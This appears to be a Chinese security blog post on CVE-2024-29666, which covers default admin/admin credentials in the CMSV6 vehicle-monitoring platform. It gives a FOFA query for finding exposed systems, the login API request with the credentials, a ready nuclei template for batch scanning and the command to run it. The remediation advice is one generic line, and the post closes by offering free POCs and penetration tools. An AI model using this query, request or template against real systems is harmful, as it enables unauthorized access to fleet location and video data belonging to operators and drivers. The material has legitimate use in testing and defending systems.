CVE-2024-29666

发布于 作者:

CVE-2024-29666

原创 fgz AI与网安 2024-03-29 07:23





本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

01

漏洞名称

CMSV6车辆监控平台系统中存在弱密码漏洞

02

漏洞影响

CMSV6 7.31.0.2、7.32.0.3

CVE-2024-29666 -1

03

漏洞描述

CMSV6平台是基于车辆位置信息服务和实时视频传输服务的创新技术和开放运营理念。为GPS运营商车辆硬件设备制造商、车队管理企业等车辆运营相关企业提供核心基础数据服务。该系统

CMSV6 7.31.0.2、7.32.0.3版本中存在弱密码漏洞。用户名:admin 密码:admin

04

FOFA搜索语句 

body="/808gps/"

CVE-2024-29666 -2

05

漏洞复现

手工使用admin/admin直接登录即可 

http://x.x.x.x/808gps/login.html

程序请求如下地址,返回值中包含admin即为成功 

http://xxx/StandardApiAction_login.action?account=admin&password=admin

CVE-2024-29666 -3

06

批量扫描 poc

nuclei poc文件内容如下 

id: CVE-2024-29666

info:
  name: CMSV6车辆监控平台系统中存在弱密码漏洞
  author: fgz
  severity: high
  description: CMSV6平台是基于车辆位置信息服务和实时视频传输服务的创新技术和开放运营理念。为GPS运营商车辆硬件设备制造商、车队管理企业等车辆运营相关企业提供核心基础数据服务。该系统CMSV6 7.31.0.2、7.32.0.3版本中存在弱密码漏洞。用户名:admin 密码:admin
  tags: cve-2024,cve
  metadata:
    max-request: 1
    fofa-query: body="/808gps/"
    verified: true

http:
  - method: GET
    path:
      - "{{BaseURL}}/StandardApiAction_login.action?account=admin&password=admin"
    headers:
      Accept-Encoding: gzip, deflate
      Accept-Language: en
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'admin')"

运行POC 

nuclei.exe -t mypoc/cve/CVE-2024-29666.yaml -l data/1.txt

07

修复建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。

08

新粉丝福利领取

在公众号主页或者文章末尾点击发送消息免费领取。

发送【
电子书】关键字获取电子书

发送【
POC】关键字获取POC

发送【
工具】获取渗透工具包